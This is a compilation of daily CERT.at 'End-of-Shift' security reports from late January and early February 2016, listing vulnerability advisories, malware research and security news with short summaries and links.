http://www.zerodayinitiative.com/advisories/ZDI-16-146/
http://www.zerodayinitiative.com/advisories/ZDI-16-147/
http://www.zerodayinitiative.com/advisories/ZDI-16-148/
http://www.zerodayinitiative.com/advisories/ZDI-16-149/
http://www.zerodayinitiative.com/advisories/ZDI-16-150/
http://www.zerodayinitiative.com/advisories/ZDI-16-151/
http://www.zerodayinitiative.com/advisories/ZDI-16-152/
http://www.zerodayinitiative.com/advisories/ZDI-16-153/
http://www.zerodayinitiative.com/advisories/ZDI-16-154/
http://www.zerodayinitiative.com/advisories/ZDI-16-155/
---------------------------------------------
*** SSA-253230 (Last Update 2016-02-08): Vulnerabilities in SIMATIC S7-1500 CPU ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-253230…
*** Bugtraq: Local Microsoft Windows 7 / 8 / 10 Buffer Overflow via Third-Party USB-Driver (ser2co64.sys) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537471
*** WooCommerce - Store Toolkit Plugin Privilege Escalation <= 1.5.6 ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8385
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in net-snmp affects IBM DataPower Gateways (CVE-2015-5621) ***
http://www.ibm.com/support/docview.wss?uid=swg21975340
---------------------------------------------
*** IBM Security Bulletin: A cross-site scripting vulnerability has been identified in IBM Security Access Manager for Web (CVE-2015-8531) ***
http://www.ibm.com/support/docview.wss?uid=swg21974651
---------------------------------------------
*** IBM Security Bulletin: IBM Security Access Manager for Web is affected by multiple NTP vulnerabilities ***
http://www.ibm.com/support/docview.wss?uid=swg21974652
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in Net-SNMP affect IBM Security Access Manager for Web (CVE-2014-3565, CVE-2015-5621) ***
http://www.ibm.com/support/docview.wss?uid=swg21974644
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM QRadar SIEM, and QRadar Incident Forensics (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976113
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM DataPower Gateways (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974965
---------------------------------------------
*** IBM Security Bulletin: Information disclosure vulnerability found in IBM WebSphere Commerce (CVE-2015-7444) ***
http://www.ibm.com/support/docview.wss?uid=swg21974307
---------------------------------------------
*** IBM Security Bulletin: IBM Security Access Manager for Web is affected by Network Security Services (NSS) vulnerabilities (CVE-2015-7181, CVE-2015-7182, CVE-2015-7183) ***
http://www.ibm.com/support/docview.wss?uid=swg21974648
---------------------------------------------
*** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by Network Security Services (NSS) vulnerabilities (CVE-2015-7181, CVE-2015-7182, CVE-2015-7183) ***
http://www.ibm.com/support/docview.wss?uid=swg21974650
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in GSKit affect IBM Security Access Manager for Web (CVE-2015-7421, CVE-2015-7420) ***
http://www.ibm.com/support/docview.wss?uid=swg21974750
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in GSKit affect IBM Security Access Manager for Mobile (CVE-2015-7421, CVE-2015-7420) ***
http://www.ibm.com/support/docview.wss?uid=swg21974747
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Mobile ***
http://www.ibm.com/support/docview.wss?uid=swg21973139
---------------------------------------------
*** IBM Security Bulletin: A libxml vulnerability affects IBM Security Access Manager for Web (CVE-2015-1819) ***
http://www.ibm.com/support/docview.wss?uid=swg21974737
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in XML processing affects IBM DataPower Gateways (CVE-2015-1819) ***
http://www.ibm.com/support/docview.wss?uid=swg21975341
---------------------------------------------
*** IBM Security Bulletin: IBM Tivoli Storage Manager ASNODENAME Vulnerability (CVE-2015-7408) ***
http://www.ibm.com/support/docview.wss?uid=swg21975957
---------------------------------------------
*** IBM Security Bulletin: A Linux-PAM vulnerability affects IBM Security Access Manager for Web (CVE-2015-3238) ***
http://www.ibm.com/support/docview.wss?uid=swg21974738
---------------------------------------------
*** IBM Security Bulletin: A Linux-PAM vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-3238) ***
http://www.ibm.com/support/docview.wss?uid=swg21975882
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2014-8121) ***
http://www.ibm.com/support/docview.wss?uid=swg21974653
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in nss-softokn affects IBM Security Access Manager for Web (CVE-2015-2730) ***
http://www.ibm.com/support/docview.wss?uid=swg21974657
---------------------------------------------
*** IBM Security Bulletin: OpenSSL as used in IBM QRadar SIEM is vulnerable to a Denial of Service attack, and Sensitive Information Exposure. (CVE-2015-3194, CVE-2015-3195, CVE-2015-3196) ***
http://www.ibm.com/support/docview.wss?uid=swg21976148
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 04-02-2016 18:00 − Freitag 05-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** WP-Invoice <= 4.1.0 - Multiple Vulnerabilities ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8378
*** User Meta Manager <= 3.4.6 - Authenticated Blind SQL Injection ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8380
*** User Meta Manager <= 3.4.6 - Privilege Escalation ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8379
*** Racing MIDI messages in Chrome ***
---------------------------------------------
This is a guest blog post by Oliver Chang from the Chrome Security team. This post is about an exceptionally bad use after free bug in Chrome's browser process that affected Linux, Chrome OS and OS X. What makes this bug interesting is the fact that it could be directly triggered from the web without ..
---------------------------------------------
http://googleprojectzero.blogspot.com/2016/02/racing-midi-messages-in-chrom…
*** DSA-3466 krb5 - security update ***
---------------------------------------------
Several vulnerabilities were discovered in krb5, the MIT implementation of Kerberos. The Common Vulnerabilities and Exposures project identifies the following ..
---------------------------------------------
https://www.debian.org/security/2016/dsa-3466
*** Neutrino Exploit Kit Not Responding - Bug or Feature? ***
---------------------------------------------
A couple of weeks ago we were looking at some exploit kits in one of our lab environments and noticed a decline in the number of Neutrino instances we're seeing. This sent us on yet another journey to investigate Neutrino ..
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/Neutrino-Exploit-Kit-Not-Res…
*** Chrome picks up bonus security features on Windows 10 ***
---------------------------------------------
The Windows 10 November update (version 1511, build 10586) included a handful of new security features to provide protection against some security issues that have kept on popping up in Windows for a number of years. Google yesterday added source ..
---------------------------------------------
http://arstechnica.com/information-technology/2016/02/chrome-picks-up-bonus…
*** A trip through the spam filters: more malspam with zip attachments containing .js files ***
---------------------------------------------
I was discussing malicious spam (malspam) with a fellow security professional earlier this week. He was examining malspam with zip attachments containing .js files. This is something I've covered previously in ISC ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20697
*** Encryption Trojan TeslaCrypt 2 cracked; criminals upgrade ***
---------------------------------------------
Victims of the notorious encryption Trojan TeslaCrypt can breathe a sigh of relief: the free tool TeslaDecoder can decrypt at least the files of version 2. But the crooks are not sleeping: version 3 is already circulating.
---------------------------------------------
http://heise.de/-3092667
*** Eset NOD32 Antivirus 9 endangers HTTPS encryption ***
---------------------------------------------
Eset NOD32 Antivirus 9 installs an SSL filter that hooks into the encryption. As heise Security discovered, under certain circumstances it accepts forged certificates; an update from the vendor fixes the bug.
---------------------------------------------
http://heise.de/-3095024
*** Dridex: botnet distributes virus scanner ***
---------------------------------------------
If cybercriminals manage to smuggle their malware onto other people's computers, they sometimes use this to make those machines part of a botnet. Via their servers they control the compromised computers and use their ..
---------------------------------------------
http://derstandard.at/2000030450321
*** The Malware Museum @ Internet Archive ***
---------------------------------------------
Here's what submitting a virus sample looked like back in the days of 5" floppy disks. And now you can see classic viruses in action at The Malware Museum. Do you feel like emulating old malware inside a MS-DOS Virtual Machine inside ..
---------------------------------------------
https://labsblog.f-secure.com/2016/02/05/the-malware-museum-internet-archiv…
*** Positive Research Center ***
---------------------------------------------
In December 2015, I found a critical vulnerability in one of PayPal business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe Java object deserialization and to access production databases. I immediately reported this bug to PayPal security team, and it was fixed promptly.
---------------------------------------------
http://blog.ptsecurity.com/2016/02/paypal-remote-code-execution.html
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 03-02-2016 18:00 − Donnerstag 04-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Numerous IP cameras from Aldi still insufficiently protected ***
---------------------------------------------
At least a three-digit number of the Maginon cameras sold by Aldi can still be controlled over the Internet without a password. Meanwhile it has emerged that the manufacturer was informed as early as June 2015.
---------------------------------------------
http://heise.de/-3092642
*** Cisco Unified Communications Manager SQL Injection Vulnerability ***
---------------------------------------------
A vulnerability in the Cisco Unified Communications Manager SQL database interface could allow an authenticated, remote attacker to impact the confidentiality of the system by executing arbitrary SQL queries.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** CERT: Poor password policy leaves OpenELEC operating system vulnerable to hackers ***
---------------------------------------------
The CERT Division at Carnegie Mellon University yesterday issued an alert detailing a password vulnerability in the Open Embedded Linux Entertainment Center operating system.
---------------------------------------------
http://www.scmagazine.com/cert-poor-password-policy-leaves-openelec-operati…
*** Macro Redux: the Premium Package ***
---------------------------------------------
Earlier this week we came across an interesting spam email. It was targeted at one of our customers in the retail industry. It contained a Microsoft Word document (MD5 = b74604d0081e68e91d64b361601d79c4) with a rather small macro in it. All that macro did was save a copy of the document as RTF, open it and then ..
---------------------------------------------
http://labs.bromium.com/2016/02/03/macro-redux-the-premium-package/
*** Cisco Jabber Guest Server HTTP Web-Based Management Interface Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the HTTP web-based management interface of the Cisco Jabber Guest application could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Unity Connection Web Framework Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco Unity Connection could allow an unauthenticated, remote attacker to execute a cross-site scripting (XSS) attack.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Fake Adobe Flash Update OS X Malware ***
---------------------------------------------
Yesterday, while investigating some Facebook click-bait, I came across a fake Flash update that is targeting OS X users. Fake flash updates have been very common to infect OS X. They do not rely on a vulnerability in the operating system. Instead, the user is asked to willingly install them, by making ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20693
*** No More Deceptive Download Buttons ***
---------------------------------------------
In November, we announced that Safe Browsing would protect you from social engineering attacks - deceptive tactics that try to trick you into doing something dangerous, like installing unwanted software or revealing your personal information (for example, passwords, phone numbers, or credit cards). You may ..
---------------------------------------------
https://googleonlinesecurity.blogspot.co.uk/2016/02/no-more-deceptive-downl…
*** l+f: Web service checks for the presence of security-relevant HTTP headers ***
---------------------------------------------
With securityheaders.io you can find out which protective features a server enables via its HTTP headers.
---------------------------------------------
http://heise.de/-3095001
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 02-02-2016 18:00 − Mittwoch 03-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** WordPress 4.4.2 Security and Maintenance Release ***
---------------------------------------------
https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance…
*** Cisco WebEx Meetings Server Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
A vulnerability in the web framework code of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of the affected system.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Sauter moduWeb Vision Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for three vulnerabilities in Sauter's moduWeb Vision application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-033-01
*** GE SNMP/Web Interface Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for two vulnerabilities in the GE SNMP/Web Interface adapter.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02
*** DMA Locker: New Ransomware, But No Reason To Panic ***
---------------------------------------------
A new piece of ransomware which looks a little clumsy.
---------------------------------------------
https://blog.malwarebytes.org/news/2016/02/draft-dma-locker-a-new-ransomwar…
*** Enhanced Mitigation Experience Toolkit (EMET) version 5.5 is now available ***
---------------------------------------------
The Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, ..
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2016/02/02/enhanced-mitigation-exper…
*** DSA-3465 openjdk-6 - security update ***
---------------------------------------------
Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform, resulting in breakouts of the Java sandbox, information disclosure, denial of service and insecure cryptography.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3465
*** Bypassing Bitrix WAF via tiny regexp error ***
---------------------------------------------
Bitrix24 is one of the first and most secure cross-platform corporate software with integrated WAF and RASP. Let's see how we can bypass them.
---------------------------------------------
https://www.htbridge.com/blog/bypassing-bitrix-web-application-firewall-via…
*** Smartphone security: root backdoor makes Mediatek smartphones attackable ***
---------------------------------------------
A debug function intended for comparison tests in the Chinese market means that numerous smartphones with Mediatek chipsets are vulnerable. Attackers can activate a local root shell. Devices on the German market could also be affected.
---------------------------------------------
http://www.golem.de/news/smartphone-security-root-backdoor-macht-mediatek-s…
*** l+f: Uncharted territory ("Neuland"), USA ***
---------------------------------------------
The multi-billion F-35 project is delayed by at least a year because technicians cannot access a database for security reasons.
---------------------------------------------
http://heise.de/-3092005
*** MMD-0051-2016 - Debunking a tiny ELF remote backdoor (shellcode shellshock part 2) ***
---------------------------------------------
In September 2014, when shellshock exploitation was in full swing, I analyzed a case (MMD-0027-2014) of an ELF payload dropped via a shellshock attack; the details can be read here -->[here]. Today I found an interesting ELF x32 sample that was reported several hours ago; the infection vector is also ShellShock, the ..
---------------------------------------------
http://blog.malwaremustdie.org/2016/02/mmd-0051-2016-debungking-tiny-elf.ht…
*** Comodo: "Secure" browser with gross security deficits ***
---------------------------------------------
Google warns against using it - undermines the browser's Same Origin Policy
---------------------------------------------
http://derstandard.at/2000030313692
*** Thunderstrike 2: security researchers now work for Apple ***
---------------------------------------------
The Mac maker has acquired a security firm that was involved in the development of "Thunderstrike 2". The researchers demonstrated vulnerabilities that make it possible to inject malware at the firmware level, and not only on Macs.
---------------------------------------------
http://heise.de/-3092644
*** Phishing attack: users are told to install an Amazon certificate ***
---------------------------------------------
Phishing attacks are among the annoying everyday occurrences for Internet users. One particular scheme is now trying to get Android users to install a supposed security certificate. Strange that the certificate has the extension .apk.
---------------------------------------------
http://www.golem.de/news/phishing-angriff-nutzer-sollen-amazon-zertifikat-i…
*** Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability ***
---------------------------------------------
A vulnerability in the ICMP implementation in the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch could allow an unauthenticated, remote attacker to cause the switch to reload, resulting in a denial of service (DoS) condition.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Application Policy Infrastructure Controller Access Control Vulnerability ***
---------------------------------------------
A vulnerability in the role-based access control (RBAC) of the Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated remote user to make configuration changes outside of their configured access privileges.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco ASA-CX and Cisco Prime Security Manager Privilege Escalation Vulnerability ***
---------------------------------------------
A vulnerability in the role-based access control of Cisco ASA-CX and Cisco Prime Security Manager (PRSM) could allow an authenticated, remote attacker to change the password of any user on the system.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Bypass Windows AppLocker ***
---------------------------------------------
AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running.
---------------------------------------------
http://en.wooyun.io/2016/01/28/Bypass-Windows-AppLocker.html
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 01-02-2016 18:00 − Dienstag 02-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cyberattack on A1 causes outage of the mobile network ***
---------------------------------------------
Attacks since Saturday - no end to the troubleshooting in sight yet
---------------------------------------------
http://derstandard.at/2000030190051
*** red|blue: A Soft-ish Introduction to Malware Analysis for Incident Responders ***
---------------------------------------------
One of my resolutions for the New Year is to spend more time conducting behavioral and static analysis of malicious PE files. I recently spent time watching some of the Cybrary Malware Reverse Engineering material and wanted to document my efforts here and share my notes and additional thoughts with you.
---------------------------------------------
http://www.redblue.team/2016/02/a-soft-introduction-to-malware-analysis.html
*** Malwarebytes Anti-Malware Vulnerability Disclosure ***
---------------------------------------------
In early November, a well-known and respected security researcher by the name of Tavis Ormandy alerted us to several security vulnerabilities in the consumer version of Malwarebytes Anti-Malware. Within days, we were able to fix several of the vulnerabilities server-side and are now internally ..
---------------------------------------------
https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulner…
*** Massive Admedia/Adverting iFrame Infection ***
---------------------------------------------
This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing features of this malware are: 32 hex digit comments at the beginning and end of the malicious ..
---------------------------------------------
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection…
*** Google plugs Android vulns ***
---------------------------------------------
Happy days if you own a Nexus. Five "critical," four "high" severity and one merely "moderate" bug make up the menu of Android security patches, which are now available for Nexus devices and ..
---------------------------------------------
www.theregister.co.uk/2016/02/02/google_plugs_android_vulns/
*** Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution ***
---------------------------------------------
The vulnerability is caused due to a boundary error in the processing of a project file, which can be exploited to cause a buffer overflow when a user opens e.g. a specially crafted .DQP project file with a large array of bytes inserted in the Description element. Successful exploitation could allow execution of arbitrary code on the affected machine.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
*** Austrian Mobile Phone Signature is vulnerable against phishing and MitM attacks ***
---------------------------------------------
Talking with various people about the Two Factor Authentication (2FA) which is used in Austria to access public services led to my impression that most people think that the system is really secure. While it is more secure than a simple user/password combination, it's by far not that secure. In this ..
---------------------------------------------
http://robert.penz.name/1224/austrian-mobile-phone-signature-is-vulnerable-…
*** Current spam wave (Dridex) ***
---------------------------------------------
In recent days there have been increasing reports that the Dridex malware is active again in force after a short winter break.
---------------------------------------------
http://www.cert.at/services/blog/20160202110607-1661.html
*** Cyber fraud at FACC: shareholders demand consequences ***
---------------------------------------------
Rasinger: "That also includes personnel consequences" - Newspaper: replacement of the CFO expected
---------------------------------------------
http://derstandard.at/2000030230502-375
*** Apache may give away Tor hidden services ***
---------------------------------------------
In its default configuration, the popular web server software discloses information that jeopardizes the anonymity promises of a Tor hidden service. These anonymous Tor services are the core of the oft-cited "Dark Net".
---------------------------------------------
http://heise.de/-3090218
*** Crash Safari Follow-Up ***
---------------------------------------------
It's been a week since short links to crashsafari.com went viral, and Google has finally killed the most prevalent link (goo.gl/78uQHK). More than three-quarters of a million clicks were made before the short link was disabled for violating ..
---------------------------------------------
https://labsblog.f-secure.com/2016/02/02/crash-safari-follow-up/
*** A1 kämpft seit Samstag gegen Hackerangriffe ***
---------------------------------------------
Ausfälle nach DDoS-Attacken zuerst im mobilen Netz, danach im Festnetz-Internet
---------------------------------------------
http://derstandard.at/2000030190051
*** Targeted IPv6 Scans Using pool.ntp.org ***
---------------------------------------------
IPv6 poses a problem for systems like Shodan, who try to enumerate vulnerabilities Internet-wide. Tools like zmap can scan the IPv4 internet in minutes (or maybe hours), but for IPv6, the same approach will still fail. The smallest IPv6 subnet is a /64, or 18.4 Quintillion addresses. A tool like zmap would ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20681
*** Socat Warns Weak Prime Number Could Mean It's Backdoored ***
---------------------------------------------
Socat published a security advisory warning users that a hard-coded 1024-bit Diffie-Hellman prime number was not prime, and that an attacker could listen and recover secrets from a key exchange.
---------------------------------------------
http://threatpost.com/socat-warns-weak-prime-number-could-mean-its-backdoor…
*** VU#719736: Fisher-Price Smart Toy platform allows some unauthenticated web API commands ***
---------------------------------------------
The Fisher-Price Smart Toy bear is a new WiFi-connected Internet of Things (IoT) toy. The device utilizes network connectivity to provide more interactivity with children.
---------------------------------------------
http://www.kb.cert.org/vuls/id/719736
*** Top Exploit Kits Round Up January Edition ***
---------------------------------------------
A look at the top exploit kits.
---------------------------------------------
https://blog.malwarebytes.org/exploitkits/2016/02/top-exploit-kits-round-up…
*** MailPoet Newsletters <= 2.6.19 - Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8373
*** Hackers claim to have broken into NASA to prove chemtrails ***
---------------------------------------------
Group "Anonsec" claims to have captured 250 GB of data and taken control of a drone
---------------------------------------------
http://derstandard.at/2000030242744
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 29-01-2016 18:00 − Montag 01-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** FreeBSD Linux Support issetugid(2) Error Lets Local Users Gain Elevated Privileges ***
---------------------------------------------
The Linux compatibility layer issetugid(2) system call may return incorrect information. A local user may be able to exploit an application that uses this system call to gain elevated privileges.
---------------------------------------------
http://www.securitytracker.com/id/1034872
*** QEMU Firmware Configuration Processing Access Flaw Lets Local Users on a Guest System Gain Elevated Privileges on the Host System ***
---------------------------------------------
A privileged local user with CAP_SYS_RAWIO capabilities on the guest system can trigger an out-of-bounds read/write access error when processing firmware configurations and cause denial of service conditions or gain elevated privileges on the host system.
---------------------------------------------
http://www.securitytracker.com/id/1034858
*** HP integrated Lights Out (iLO) TLS Diffie-Hellman Export Cipher Downgrade Attack Lets Remote Users Decrypt Connections ***
---------------------------------------------
A remote user that can conduct a man-in-the-middle attack can cause the target system to downgrade the Diffie-Hellman algorithm to 512-bit export-grade cryptography. The remote user may then be able to decrypt the connection.
---------------------------------------------
http://www.securitytracker.com/id/1034884
*** Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability ***
---------------------------------------------
XXE (XML External Entity) processing through upload of SVG images in the CMS, and through XML import in the CMS Console application.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
*** Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability ***
---------------------------------------------
Hippo CMS suffers from a stored XSS vulnerability. Input passed through the POST parameters groupname and description is not sanitized, allowing the attacker to execute HTML code in users' browser sessions on the affected site.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php
*** HP Client Security Manager 8.3.4 Cross-Site Scripting Vulnerability ***
---------------------------------------------
HP Client Security Manager is prone to XSS attacks because of a lack of sanitization of data from HTML forms. It makes any site vulnerable even without XSS presence on the site.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5299.php
*** Now VirusTotal can scan your firmware image for bad executables ***
---------------------------------------------
VirusTotal presented a new malware scanning engine that allows users to analyze their firmware images searching for malicious codes. VirusTotal has recently announced the launch of a new malware scanning service for firmware ..
---------------------------------------------
http://securityaffairs.co/wordpress/44097/malware/virustotal-firmware-scan.…
*** 6 million US dollars for security vulnerabilities in Google products ***
---------------------------------------------
Google continues to be generous when security researchers report new vulnerabilities in Chrome, Android & Co. to the company.
---------------------------------------------
http://heise.de/-3088182
*** DSA-3460 privoxy - security update ***
---------------------------------------------
It was discovered that privoxy, a web proxy with advanced filtering capabilities, contained invalid reads that could enable a remote attacker to crash the application, thus causing a Denial of Service.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3460
*** Is security outfit Norse Corp dead or just temporarily TITSUP? ***
---------------------------------------------
Imploding, says Brian Krebs. Security startup Norse Corp has gone ominously dark.
---------------------------------------------
www.theregister.co.uk/2016/02/01/is_norse_corp_dead_or_just_temporarily_tit…
*** LibreSSL emits new versions, says not vulnerable to OpenSSL bug ***
---------------------------------------------
Cisco's pedalling hard to prepare patches too. Corrected: LibreSSL sysadmins should keep an eye on their mirrors for a soon-to-land update.
---------------------------------------------
www.theregister.co.uk/2016/02/01/openbsd_rolls_in_libressl_bug_fixes/
*** DSA-3463 prosody - security update ***
---------------------------------------------
It was discovered that insecure handling of dialback keys may allow a malicious XMPP server to impersonate another server.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3463
*** No more "123456": 1 February is "Change your password" day ***
---------------------------------------------
Numerous users still use hair-raisingly insecure passwords
---------------------------------------------
http://derstandard.at/2000030144886
*** Currently circulating: Trojan e-mail sent in the name of the copier ***
---------------------------------------------
Criminals are currently sending increasing numbers of e-mails with malicious code attached, using spoofed sender addresses of network copiers.
---------------------------------------------
http://heise.de/-3088536
*** GAME OVER: HOW A COLOURFUL GAME TURNED INTO A SUBSCRIPTION TRAP - App from the Google Play store automatically set up two subscriptions in the Netherlands ***
---------------------------------------------
Premium SMS messages were the first attacks on Android users - almost six years ago, malware with this functionality was the primary risk. Since then of course, the malware landscape for mobile devices has moved on significantly. For this very ..
---------------------------------------------
https://blog.gdatasoftware.com/blog/article/game-over-how-a-colourful-game-…
*** There's a lot of vulnerable OS X applications out there. ***
---------------------------------------------
Lately, I was doing research connected with different updating strategies, and I tested a few applications working under Mac OS X. This short weekend research revealed that we have many insecure applications in the wild. As a result, I have found a vulnerability which allows an attacker to take control of another computer on the same network (via MITM).
---------------------------------------------
https://vulnsec.com/2016/osx-apps-vulnerabilities/
*** Illegal payment service Liberty Reserve: founder pleads guilty to money laundering ***
---------------------------------------------
US authorities describe the online service Liberty Reserve, shut down in 2013, as "the bank of choice for the criminal underworld". The founder has now pleaded guilty to laundering more than 250 million US dollars.
---------------------------------------------
http://heise.de/-3088621
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 28-01-2016 18:00 − Freitag 29-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Elaborate iCloud Phish Used To Activate Stolen iPhones ***
---------------------------------------------
Lost your iPhone? Beware of messages claiming it was found.
---------------------------------------------
https://blog.malwarebytes.org/phishing/2016/01/elaborate-icloud-phish-used-…
*** New Attacks Linked to C0d0so0 Group ***
---------------------------------------------
While recently researching unknown malware and attack campaigns using the AutoFocus threat intelligence platform, Unit 42 discovered new activity that appears related to an adversary group previously called "C0d0so0" or "Codoso". This group is well...
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0…
*** A key to the unsecured smart home ***
---------------------------------------------
Experts warn of insecure home solutions that are connected to the internet. Consumers should demand more security from manufacturers.
---------------------------------------------
http://futurezone.at/digital-life/ein-schluessel-fuers-ungesicherte-smart-h…
*** Trojan targeted dozens of games on Google Play ***
---------------------------------------------
January 28, 2016. Doctor Web security researchers detected the Android.Xiny.19.origin Trojan that targeted dozens of games published on the Google Play store. The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. In addition, it can display annoying advertisements. The Trojan was incorporated into more than 60 games that were then distributed via Google Play in the names of more than 30 game developers, including Conexagon Studio, Fun Color...
---------------------------------------------
http://news.drweb.com/show/?i=9803&lng=en&c=9
*** OpenSSL vulnerability: the matter of safe primes ***
---------------------------------------------
With a security update, OpenSSL has fixed a vulnerability in the Diffie-Hellman key exchange whose risk is rated as "high". However, hardly anyone is likely to be affected by the vulnerability in practice.
---------------------------------------------
http://www.golem.de/news/openssl-luecke-die-sache-mit-den-sicheren-primzahl…
*** Car hijacked with a malicious song ***
---------------------------------------------
A security researcher who discovered a critical vulnerability in an automotive system back in 2010 has now explained how it works: with malicious code hidden in a song. Similar attacks are still conceivable today.
---------------------------------------------
http://heise.de/-3087160
*** 27% of all malware variants in history were created in 2015 ***
---------------------------------------------
Last year was a record year for malware, according to a new report from Panda Security, with more than 84 million new malware samples collected over the course of the year. That averages out to around 230,000 new malware samples a day, said Luis Corrons, technical director of Panda's PandaLabs unit. Or 27 percent of all malware ever created. Trojans continued to account for the main bulk of malware, at 51.45 percent, followed by viruses at 22.79 percent, worms at 13.22 percent, potentially...
---------------------------------------------
http://www.cio.com/article/3027621/cyber-attacks-espionage/27-of-all-malwar…
*** From Linux to Windows - New Family of Cross-Platform Desktop Backdoors Discovered ***
---------------------------------------------
Background Recently we came across a new family of cross-platform backdoors for desktop environments. First we got the Linux variant, and with information extracted from its binary, we were able to find the variant for Windows desktops, too. Not only...
---------------------------------------------
http://securelist.com/blog/research/73503/from-linux-to-windows-new-family-…
*** Guest talk: "Hidden GEMs: Automated Discovery of Access Control Vulnerabilities in Graphical User Interfaces" ***
---------------------------------------------
February 02, 2016 - 11:00 am - 12:00 pm SBA Research Favoritenstraße 16 1040 Wien
---------------------------------------------
https://www.sba-research.org/events/guest-talk-hidden-gems-automated-discov…
*** Security Advisory: Linux kernel vulnerability CVE-2015-7509 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/73/sol73189318.html?…
*** DSA-3459 mysql-5.5 - security update ***
---------------------------------------------
Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.47. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details:
---------------------------------------------
